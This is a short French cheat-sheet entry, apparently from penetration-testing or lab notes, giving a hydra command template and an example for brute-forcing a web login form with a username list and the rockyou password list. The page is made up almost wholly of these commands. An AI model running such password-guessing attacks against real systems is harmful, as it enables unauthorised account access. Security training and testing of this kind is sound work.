Skip to main content

Bruteforce

Login page

Bruteforce d'une page de login avec hydra :

hydra -s <PORT> <IP> http-post-form	"<PATH>:<KEY>:<VALUE>:<ERROR MSG>" -L user.txt -P pass.txt

Exemple :

hydra -s 8080 10.10.57.111 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^:Invalid username or password" -L username.txt -P rockyou.txt